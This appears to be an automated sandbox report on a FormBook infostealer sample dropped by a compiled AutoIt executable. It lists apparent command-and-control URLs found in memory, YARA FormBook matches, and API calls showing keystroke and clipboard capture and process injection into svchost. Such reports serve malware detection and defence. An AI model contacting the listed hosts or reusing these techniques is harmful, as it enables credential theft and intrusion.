                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:38:58 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sat, 28 Aug 2021 19:11:49 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
                    Source: raserver.exe, 00000005.00000002.3545676916.0000000005596000.00000004.10000000.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3545110543.0000000003026000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1606462894.0000000005536000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
                    Source: RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3545110543.0000000004622000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
                    Source: RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3546898290.0000000004F4D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.l54354.xyz
                    Source: RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3546898290.0000000004F4D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.l54354.xyz/11bh/
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: raserver.exe, 00000005.00000002.3545676916.0000000006A00000.00000004.10000000.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3545110543.0000000004490000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/yandex-metrica-watch/tag.js
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033#
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: raserver.exe, 00000005.00000003.1493163806.0000000007DEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                    Source: raserver.exe, 00000005.00000002.3547636764.0000000007E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                    Source: raserver.exe, 00000005.00000002.3545676916.0000000005728000.00000004.10000000.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3545110543.00000000031B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/11bh/
                    Source: raserver.exe, 00000005.00000002.3545676916.0000000005728000.00000004.10000000.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3545110543.00000000031B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/11bh/
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001A425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001A425A
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001A4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_001A4458
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00084458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00084458
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001A425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001A425A
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00190219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00190219
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001BCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_001BCDAC
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0009CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0009CDAC

                    E-Banking Fraud

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1307445094.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252330585.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3546898290.0000000004EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252898618.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3543179880.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252099883.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3544967404.0000000004790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3545019349.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3545054686.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: This is a third-party compiled AutoIt script.0_2_00133B4C
                    Source: CjbMEPJZ3J.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: CjbMEPJZ3J.exe, 00000000.00000002.1094744305.00000000001E5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cfed821d-d
                    Source: CjbMEPJZ3J.exe, 00000000.00000002.1094744305.00000000001E5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4b37e798-0
                    Source: CjbMEPJZ3J.exe, 00000000.00000003.1090129040.0000000003B95000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8a2fabfb-4
                    Source: CjbMEPJZ3J.exe, 00000000.00000003.1090129040.0000000003B95000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a1106ed3-9
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: This is a third-party compiled AutoIt script.2_2_00013B4C
                    Source: unnervously.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: unnervously.exe, 00000002.00000000.1093949339.00000000000C5000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_79bef195-8
                    Source: unnervously.exe, 00000002.00000000.1093949339.00000000000C5000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_22c7d4e5-8
                    Source: unnervously.exe, 00000008.00000000.1238255718.00000000000C5000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7947dd0b-4
                    Source: unnervously.exe, 00000008.00000000.1238255718.00000000000C5000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_40b3faba-5
                    Source: CjbMEPJZ3J.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4a6d2432-5
                    Source: CjbMEPJZ3J.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8b4005f7-6
                    Source: unnervously.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_712638c4-f
                    Source: unnervously.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e6ad1bd7-6
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042CB13 NtClose,3_2_0042CB13
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072B60 NtClose,LdrInitializeThunk,3_2_03072B60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03072DF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030735C0 NtCreateMutant,LdrInitializeThunk,3_2_030735C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03074340 NtSetContextThread,3_2_03074340
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03074650 NtSuspendThread,3_2_03074650
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072B80 NtQueryInformationFile,3_2_03072B80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072BA0 NtEnumerateValueKey,3_2_03072BA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072BE0 NtQueryValueKey,3_2_03072BE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072BF0 NtAllocateVirtualMemory,3_2_03072BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072AB0 NtWaitForSingleObject,3_2_03072AB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072AD0 NtReadFile,3_2_03072AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072AF0 NtWriteFile,3_2_03072AF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072F30 NtCreateSection,3_2_03072F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072F60 NtCreateProcessEx,3_2_03072F60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072F90 NtProtectVirtualMemory,3_2_03072F90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072FA0 NtQuerySection,3_2_03072FA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072FB0 NtResumeThread,3_2_03072FB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072FE0 NtCreateFile,3_2_03072FE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072E30 NtWriteVirtualMemory,3_2_03072E30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072E80 NtReadVirtualMemory,3_2_03072E80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072EA0 NtAdjustPrivilegesToken,3_2_03072EA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072EE0 NtQueueApcThread,3_2_03072EE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072D00 NtSetInformationFile,3_2_03072D00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072D10 NtMapViewOfSection,3_2_03072D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072D30 NtUnmapViewOfSection,3_2_03072D30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072DB0 NtEnumerateKey,3_2_03072DB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072DD0 NtDelayExecution,3_2_03072DD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072C00 NtQueryInformationProcess,3_2_03072C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072C60 NtCreateKey,3_2_03072C60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072C70 NtFreeVirtualMemory,3_2_03072C70
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072CA0 NtQueryInformationToken,3_2_03072CA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072CC0 NtQueryVirtualMemory,3_2_03072CC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072CF0 NtOpenProcess,3_2_03072CF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03073010 NtOpenDirectoryObject,3_2_03073010
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03073090 NtSetValueKey,3_2_03073090
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030739B0 NtGetContextThread,3_2_030739B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03073D10 NtOpenProcessToken,3_2_03073D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03073D70 NtOpenThread,3_2_03073D70
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00194021: CreateFileW,DeviceIoControl,CloseHandle,0_2_00194021
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00188858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00188858
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0019545F
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0007545F
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0013E8000_2_0013E800
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0015DBB50_2_0015DBB5
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0013FE400_2_0013FE40
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001B804A0_2_001B804A
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0013E0600_2_0013E060
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001441400_2_00144140
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001524050_2_00152405
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001665220_2_00166522
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0016267E0_2_0016267E
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001B06650_2_001B0665
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0015283A0_2_0015283A
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001468430_2_00146843
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001689DF0_2_001689DF
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00148A0E0_2_00148A0E
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00166A940_2_00166A94
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001B0AE20_2_001B0AE2
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00198B130_2_00198B13
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0018EB070_2_0018EB07
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0015CD610_2_0015CD61
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001670060_2_00167006
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0014710E0_2_0014710E
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001431900_2_00143190
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001312870_2_00131287
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001533C70_2_001533C7
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0015F4190_2_0015F419
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001456800_2_00145680
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001516C40_2_001516C4
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001578D30_2_001578D3
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001458C00_2_001458C0
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00151BB80_2_00151BB8
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00169D050_2_00169D05
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00151FD00_2_00151FD0
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0015BFE60_2_0015BFE6
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_011A86080_2_011A8608
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0001E8002_2_0001E800
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0003DBB52_2_0003DBB5
